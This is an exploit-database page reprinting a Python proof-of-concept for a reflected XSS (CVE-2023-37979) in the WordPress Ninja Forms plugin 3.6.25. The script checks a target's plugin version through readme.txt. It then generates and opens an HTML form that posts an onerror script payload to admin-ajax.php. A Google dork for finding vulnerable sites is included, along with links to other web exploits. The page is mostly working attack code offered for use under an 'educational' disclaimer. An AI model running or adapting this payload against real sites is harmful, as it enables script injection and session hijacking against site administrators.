Wordpress plugin ninja forms 3.6.25 reflected xss Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-08-04 | Type : webapps | Platform : php
This exploit / vulnerability Wordpress plugin ninja forms 3.6.25 reflected xss is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979

from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep


# Values:
url = argv[-1]
if url[-1] == "/":
url = url.rstrip("/")

# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"

# HTML template
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
<title>{CVE_NAME}</title>
<style>
body {{
font-family: Arial, sans-serif;
background-color: #f7f7f7;
color: #333;
margin: 0;
padding: 0;
}}
header {{
background-color: #4CAF50;
padding: 10px;
text-align: center;
color: white;
font-size: 24px;
}}
.cool-button {{
background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
cursor: pointer;
font-size: 16px;
border-radius: 4px;
}}
.cool-button:hover {{
background-color: #0056b3;
}}
</style>
</head>
<body>
<header>
Ninja-forms reflected XSS ({CVE_NAME})</br>
Created by Mehran Seifalinia
</header>
<div style="padding: 20px;">
<form action="{url}/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf&#95;batch&#95;process" />
<input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
<input type="hidden" name="security" value="e29f2d8dca" />
<input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
<input type="hidden" name="method&#95;override" value="&#95;respond" />
<input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
<input type="submit" class="cool-button" value="Click here to Execute XSS" />
</form>
</div>
<div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
<footer>
<a href="https://github.com/Mehran-Seifalinia">Github</a>
</br>
<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
</footer>
</body>
</html>
"""

def exploit():
with open(f"{CVE_NAME}.html", "w") as poc:
poc.write(HTML_TEMPLATE)
print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
sleep(2)
webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")

# Check if the vulnerable version is installed
def check_CVE():
try:
response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
if response.status_code != 200 or not("Ninja Forms" in response.text):
print("[!] Ninja-forms plugin has not installed on this site.")
return False
else:
version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
main_version = int(version.split(".")[0])
partial_version = int(version.split(".")[1])
final_version = int(version.split(".")[2])
if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
print(f"[*] Vulnerable Nonja-forms version {version} detected!")
return True
else:
print(f"[!] Nonja-forms version {version} is not vulnerable!")
return False
except Exception as error:
print(f"[!] Error: {error}")
exit()

# Check syntax of the script
def check_script():
usage = f"""
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]

OPTIONS:
--exploit: Open a browser and execute the vulnerability.
TARGET:
An URL starts with 'http://' or 'https://'

Examples:
> {argv[0].split("/")[-1]} https://vulnsite.com
> {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
try:
if len(argv) < 2 or len(argv) > 3:
print("[!] Syntax error...")
print(usage)
exit()
elif not url.startswith(tuple(["http://", "https://"])):
print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
exit()
else:
for arg in argv:
if arg == argv[0]:
print("[*]Starting the script >>>")
state = check_CVE()
if state == False:
exit()
elif arg.lower() == "--exploit":
exploit()
elif arg == url:
continue
else:
print(f"[!] What the heck is '{arg}' in the command?")
except Exception as error:
print(f"[!] Error: {error}")
exit()

if __name__ == "__main__":
check_script()

Wordpress plugin ninja forms 3.6.25 reflected xss


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Wordpress plugin ninja forms 3.6.25 reflected xss Vulnerability / Exploit